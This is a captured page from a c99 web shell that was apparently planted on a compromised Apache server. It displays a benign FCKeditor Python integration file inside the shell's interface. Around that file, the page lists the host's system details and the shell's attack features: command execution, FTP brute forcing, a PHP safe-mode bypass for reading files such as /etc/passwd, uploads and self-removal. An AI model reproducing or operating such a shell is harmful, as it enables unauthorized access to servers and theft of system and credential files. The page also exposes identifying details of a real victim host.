!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/ealumni/fckeditor/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     fckeditor.py (4.29 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2007 Frederico Caldeira Knabben

== BEGIN LICENSE ==

Licensed under the terms of any of the following licenses at your
choice:

 - GNU General Public License Version 2 or later (the "GPL")
   http://www.gnu.org/licenses/gpl.html

 - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
   http://www.gnu.org/licenses/lgpl.html

 - Mozilla Public License Version 1.1 or later (the "MPL")
   http://www.mozilla.org/MPL/MPL-1.1.html

== END LICENSE ==

This is the integration file for Python.
"""

import cgi
import os
import re
import string

def escape(text, replace=string.replace):
    """Converts the special characters '<', '>', and '&'.

    RFC 1866 specifies that these characters be represented
    in HTML as &lt; &gt; and &amp; respectively. In Python
    1.5 we use the new string.replace() function for speed.
    """
    text = replace(text, '&', '&amp;') # must be done 1st
    text = replace(text, '<', '&lt;')
    text = replace(text, '>', '&gt;')
    text = replace(text, '"', '&quot;')
    text = replace(text, "'", '&#39;')
    return text

# The FCKeditor class
class FCKeditor(object):
    def __init__(self, instanceName):
        self.InstanceName = instanceName
        self.BasePath = '/fckeditor/'
        self.Width = '100%'
        self.Height = '200'
        self.ToolbarSet = 'Default'
        self.Value = '';

        self.Config = {}

    def Create(self):
        return self.CreateHtml()

    def CreateHtml(self):
        HtmlValue = escape(self.Value)
        Html = "<div>"

        if (self.IsCompatible()):
            File = "fckeditor.html"
            Link = "%seditor/%s?InstanceName=%s" % (
                    self.BasePath,
                    File,
                    self.InstanceName
                    )
            if (self.ToolbarSet is not None):
                Link += "&amp;ToolBar=%s" % self.ToolbarSet

            # Render the linked hidden field
            Html += "<input type=\"hidden\" id=\"%s\" name=\"%s\" value=\"%s\" style=\"display:none\" />" % (
                    self.InstanceName,
                    self.InstanceName,
                    HtmlValue
                    )

            # Render the configurations hidden field
            Html += "<input type=\"hidden\" id=\"%s___Config\" value=\"%s\" style=\"display:none\" />" % (
                    self.InstanceName,
                    self.GetConfigFieldString()
                    )

            # Render the editor iframe
            Html += "<iframe id=\"%s\__Frame\" src=\"%s\" width=\"%s\" height=\"%s\" frameborder=\"0\" scrolling=\"no\"></iframe>" % (
                    self.InstanceName,
                    Link,
                    self.Width,
                    self.Height
                    )
        else:
            if (self.Width.find("%%") < 0):
                WidthCSS = "%spx" % self.Width
            else:
                WidthCSS = self.Width
            if (self.Height.find("%%") < 0):
                HeightCSS = "%spx" % self.Height
            else:
                HeightCSS = self.Height

            Html += "<textarea name=\"%s\" rows=\"4\" cols=\"40\" style=\"width: %s; height: %s;\" wrap=\"virtual\">%s</textarea>" % (
                    self.InstanceName,
                    WidthCSS,
                    HeightCSS,
                    HtmlValue
                    )
        Html += "</div>"
        return Html

    def IsCompatible(self):
        if (os.environ.has_key("HTTP_USER_AGENT")):
            sAgent = os.environ.get("HTTP_USER_AGENT", "")
        else:
            sAgent = ""
        if (sAgent.find("MSIE") >= 0) and (sAgent.find("mac") < 0) and (sAgent.find("Opera") < 0):
            i = sAgent.find("MSIE")
            iVersion = float(sAgent[i+5:i+5+3])
            if (iVersion >= 5.5):
                return True
            return False
        elif (sAgent.find("Gecko/") >= 0):
            i = sAgent.find("Gecko/")
            iVersion = int(sAgent[i+6:i+6+8])
            if (iVersion >= 20030210):
                return True
            return False
        elif (sAgent.find("Opera/") >= 0):
            i = sAgent.find("Opera/")
            iVersion = float(sAgent[i+6:i+6+4])
            if (iVersion >= 9.5):
                return True
            return False
        elif (sAgent.find("AppleWebKit/") >= 0):
            p = re.compile('AppleWebKit\/(\d+)', re.IGNORECASE)
            m = p.search(sAgent)
            if (m.group(1) >= 522):
                return True
            return False
        else:
            return False

    def GetConfigFieldString(self):
        sParams = ""
        bFirst = True
        for sKey in self.Config.keys():
            sValue = self.Config[sKey]
            if (not bFirst):
                sParams += "&amp;"
            else:
                bFirst = False
            if (sValue):
                k = escape(sKey)
                v = escape(sValue)
                if (sValue == "true"):
                    sParams += "%s=true" % k
                elif (sValue == "false"):
                    sParams += "%s=false" % k
                else:
                    sParams += "%s=%s" % (k, v)
        return sParams


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0138 ]--